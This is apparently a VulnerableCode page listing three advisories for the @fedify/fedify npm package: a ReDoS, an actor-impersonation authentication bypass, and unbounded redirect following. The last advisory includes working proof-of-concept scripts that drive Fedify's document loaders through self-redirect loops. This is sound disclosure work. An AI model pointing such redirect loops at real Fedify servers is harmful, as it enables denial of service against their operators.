VulnerableCode Package Details - pkg:npm/%40fedify/fedify@0.9.2

Vulnerabilities affecting this package (3)

Vulnerability	Summary	Fixed by
VCID-4121-6555-67fv Aliases: CVE-2025-68475 GHSA-rchf-xwx2-hm93	Fedify has ReDoS Vulnerability in HTML Parsing Regex A Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at `packages/fedify/src/runtime/docloader.ts:259` contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. An attacker-controlled federated server can respond with a small (~170 bytes) malicious HTML payload that blocks the victim's Node.js event loop for 14+ seconds, causing a Denial of Service. \| Field \| Value \| \|-------\|-------\| \| CWE \| CWE-1333 (Inefficient Regular Expression Complexity) \| ---	1.6.13 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} 1.7.14 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} 1.8.15 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} 1.9.2 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }}
VCID-jjm6-67ep-rfh2 Aliases: CVE-2025-54888 GHSA-6jcc-xgcr-q3h4	@fedify/fedify has Improper Authentication and Incorrect Authorization An authentication bypass vulnerability allows any unauthenticated attacker to impersonate any ActivityPub actor by sending forged activities signed with their own keys. Activities are processed before verifying the signing key belongs to the claimed actor, enabling complete actor impersonation across all Fedify instances	1.3.20 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }} 1.4.13 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }} 1.5.5 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }} 1.6.8 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }} 1.7.9 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }} 1.8.5 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }} 1.9.0-dev.1328 Affected by 1 other vulnerability. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }}
VCID-xtfy-zmxz-d3dq Aliases: CVE-2026-34148 GHSA-gm9m-gwc4-hwgp	Fedify affected by resource exhaustion caused by unbounded redirect following during remote key/document resolution ### Summary `@fedify/fedify` follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service. ### Details Fedify verifies ActivityPub HTTP signatures by fetching the remote `keyId` during request processing. The relevant flow is `handleInboxInternal()` -> `verifyRequest()` -> `fetchKeyInternal()` -> document loader. In affected versions: - the generic document loader recursively follows `3xx` responses by calling `load()` again on the `Location` header - the authenticated redirect path (`doubleKnock()`) also recursively follows redirects - neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops As a result, if an attacker-controlled `keyId` or actor URL responds with `302 Location: <same URL>`, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out. I confirmed the issue in `@fedify/fedify` 1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended. Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same `keyId`. ### PoC Minimal direct reproduction with the package: 1. Install `@fedify/fedify@1.9.2`. 2. Save and run the following script: ```js import http from "node:http"; import { getDocumentLoader } from "@fedify/fedify"; const port = 45679; let count = 0; const redirectCount = 120; const server = http.createServer((req, res) => { count += 1; if (count < redirectCount) { res.writeHead(302, { Location: `http://127.0.0.1:${port}/actor`, }); res.end(); return; } res.writeHead(200, { "Content-Type": "application/activity+json" }); res.end(JSON.stringify({ "@context": "https://www.w3.org/ns/activitystreams", "id": `http://127.0.0.1:${port}/actor`, "type": "Person" })); }); await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve)); try { const loader = getDocumentLoader({ allowPrivateAddress: true }); await loader(`http://127.0.0.1:${port}/actor`); console.log({ count }); } finally { server.close(); } ``` 3. Observe output similar to: ``` { count: 120 } ``` This shows the loader followed 119 self-redirects before the first non-redirect response. The authenticated loader used for signed requests shows the same behavior: ``` import http from "node:http"; import { generateCryptoKeyPair, getAuthenticatedDocumentLoader, } from "@fedify/fedify"; const port = 45680; let count = 0; const redirectCount = 120; const server = http.createServer((req, res) => { count += 1; if (count < redirectCount) { res.writeHead(302, { Location: `http://127.0.0.1:${port}/actor`, }); res.end(); return; } res.writeHead(200, { "Content-Type": "application/activity+json" }); res.end(JSON.stringify({ "@context": "https://www.w3.org/ns/activitystreams", "id": `http://127.0.0.1:${port}/actor`, "type": "Person" })); }); await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve)); try { const { privateKey } = await generateCryptoKeyPair(); const loader = getAuthenticatedDocumentLoader( { privateKey, keyId: new URL("https://example.com/users/index#main-key"), }, { allowPrivateAddress: true }, ); await loader(`http://127.0.0.1:${port}/actor`); console.log({ count }); } finally { server.close(); } ``` ### Impact This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached. ### Misc Notes This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. The original reporter should be credited for the discovery. In case you accept this advisory please coordinate time of disclosure and credit with us	1.9.6 Affected by 0 other vulnerabilities. 1.10.5 Affected by 0 other vulnerabilities. 2.0.8 Affected by 0 other vulnerabilities. 2.1.1 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-4121-6555-67fv
Aliases:
CVE-2025-68475
GHSA-rchf-xwx2-hm93

Fedify has ReDoS Vulnerability in HTML Parsing Regex A Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at `packages/fedify/src/runtime/docloader.ts:259` contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. **An attacker-controlled federated server can respond with a small (~170 bytes) malicious HTML payload that blocks the victim's Node.js event loop for 14+ seconds, causing a Denial of Service.** | Field | Value | |-------|-------| | **CWE** | CWE-1333 (Inefficient Regular Expression Complexity) | ---

1.6.13
Affected by 1 other vulnerability.

1.7.14
Affected by 1 other vulnerability.

1.8.15
Affected by 1 other vulnerability.

1.9.2
Affected by 1 other vulnerability.

VCID-jjm6-67ep-rfh2
Aliases:
CVE-2025-54888
GHSA-6jcc-xgcr-q3h4

@fedify/fedify has Improper Authentication and Incorrect Authorization An authentication bypass vulnerability allows any unauthenticated attacker to impersonate any ActivityPub actor by sending forged activities signed with their own keys. Activities are processed before verifying the signing key belongs to the claimed actor, enabling complete actor impersonation across all Fedify instances

1.3.20
Affected by 2 other vulnerabilities.

1.4.13
Affected by 2 other vulnerabilities.

1.5.5
Affected by 2 other vulnerabilities.

1.6.8
Affected by 2 other vulnerabilities.

1.7.9
Affected by 2 other vulnerabilities.

1.8.5
Affected by 2 other vulnerabilities.

1.9.0-dev.1328
Affected by 1 other vulnerability.

VCID-xtfy-zmxz-d3dq
Aliases:
CVE-2026-34148
GHSA-gm9m-gwc4-hwgp

Fedify affected by resource exhaustion caused by unbounded redirect following during remote key/document resolution ### Summary `@fedify/fedify` follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service. ### Details Fedify verifies ActivityPub HTTP signatures by fetching the remote `keyId` during request processing. The relevant flow is `handleInboxInternal()` -> `verifyRequest()` -> `fetchKeyInternal()` -> document loader. In affected versions: - the generic document loader recursively follows `3xx` responses by calling `load()` again on the `Location` header - the authenticated redirect path (`doubleKnock()`) also recursively follows redirects - neither path enforces a redirect cap or tracks visited URLs to detect self-referential redirect loops As a result, if an attacker-controlled `keyId` or actor URL responds with `302 Location: <same URL>`, a single ActivityPub request can trigger tens or hundreds of outbound requests before the fetch completes or the request times out. I confirmed the issue in `@fedify/fedify` 1.9.1 and 1.9.2. By contrast, Fedify's WebFinger lookup path already has a redirect cap, which suggests the missing bound in the document loader is unintended. Failed key fetches are not durably negatively cached. After a failed lookup, the null result is only remembered in a request-local cache, so later requests can trigger the same redirect loop again for the same `keyId`. ### PoC Minimal direct reproduction with the package: 1. Install `@fedify/fedify@1.9.2`. 2. Save and run the following script: ```js import http from "node:http"; import { getDocumentLoader } from "@fedify/fedify"; const port = 45679; let count = 0; const redirectCount = 120; const server = http.createServer((req, res) => { count += 1; if (count < redirectCount) { res.writeHead(302, { Location: `http://127.0.0.1:${port}/actor`, }); res.end(); return; } res.writeHead(200, { "Content-Type": "application/activity+json" }); res.end(JSON.stringify({ "@context": "https://www.w3.org/ns/activitystreams", "id": `http://127.0.0.1:${port}/actor`, "type": "Person" })); }); await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve)); try { const loader = getDocumentLoader({ allowPrivateAddress: true }); await loader(`http://127.0.0.1:${port}/actor`); console.log({ count }); } finally { server.close(); } ``` 3. Observe output similar to: ``` { count: 120 } ``` This shows the loader followed 119 self-redirects before the first non-redirect response. The authenticated loader used for signed requests shows the same behavior: ``` import http from "node:http"; import { generateCryptoKeyPair, getAuthenticatedDocumentLoader, } from "@fedify/fedify"; const port = 45680; let count = 0; const redirectCount = 120; const server = http.createServer((req, res) => { count += 1; if (count < redirectCount) { res.writeHead(302, { Location: `http://127.0.0.1:${port}/actor`, }); res.end(); return; } res.writeHead(200, { "Content-Type": "application/activity+json" }); res.end(JSON.stringify({ "@context": "https://www.w3.org/ns/activitystreams", "id": `http://127.0.0.1:${port}/actor`, "type": "Person" })); }); await new Promise((resolve) => server.listen(port, "127.0.0.1", resolve)); try { const { privateKey } = await generateCryptoKeyPair(); const loader = getAuthenticatedDocumentLoader( { privateKey, keyId: new URL("https://example.com/users/index#main-key"), }, { allowPrivateAddress: true }, ); await loader(`http://127.0.0.1:${port}/actor`); console.log({ count }); } finally { server.close(); } ``` ### Impact This is an unauthenticated denial-of-service / request amplification issue. Any Fedify-based server that verifies remote keys or loads remote ActivityPub documents can be forced to spend CPU time, worker time, connection slots, and outbound bandwidth following attacker-controlled redirects. A single inbound request can trigger a large number of outbound requests, and the attack can be repeated across requests because failed lookups are not durably negatively cached. ### Misc Notes This issue was surfaced by a Ghost ActivityPub user reporting the issue directly to Ghost. The above report was generated upon further investigation into the issue by the Ghost team. **The original reporter should be credited for the discovery**. In case you accept this advisory please coordinate time of disclosure and credit with us

1.9.6
Affected by 0 other vulnerabilities.

1.10.5
Affected by 0 other vulnerabilities.

2.0.8
Affected by 0 other vulnerabilities.

2.1.1
Affected by 0 other vulnerabilities.

Next non-vulnerable version	1.9.6
Latest non-vulnerable version	2.2.3
Risk	4.0

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-06T07:48:19.653424+00:00	GitLab Importer	Affected by	VCID-xtfy-zmxz-d3dq	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@fedify/fedify/CVE-2026-34148.yml	38.6.0
2026-06-06T06:33:03.993505+00:00	GitLab Importer	Affected by	VCID-4121-6555-67fv	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@fedify/fedify/CVE-2025-68475.yml	38.6.0
2026-06-06T05:57:18.008556+00:00	GitLab Importer	Affected by	VCID-jjm6-67ep-rfh2	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@fedify/fedify/CVE-2025-54888.yml	38.6.0
2026-06-05T21:46:01.226307+00:00	GHSA Importer	Fixing	VCID-g8kd-efd5-tudd	https://github.com/advisories/GHSA-p9cg-vqcc-grcx	38.6.0
2026-06-04T16:50:29.185734+00:00	GithubOSV Importer	Fixing	VCID-g8kd-efd5-tudd	https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-p9cg-vqcc-grcx/GHSA-p9cg-vqcc-grcx.json	38.6.0
2026-06-04T16:22:01.023201+00:00	GitLab Importer	Fixing	VCID-g8kd-efd5-tudd	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/@fedify/fedify/CVE-2024-39687.yml	38.6.0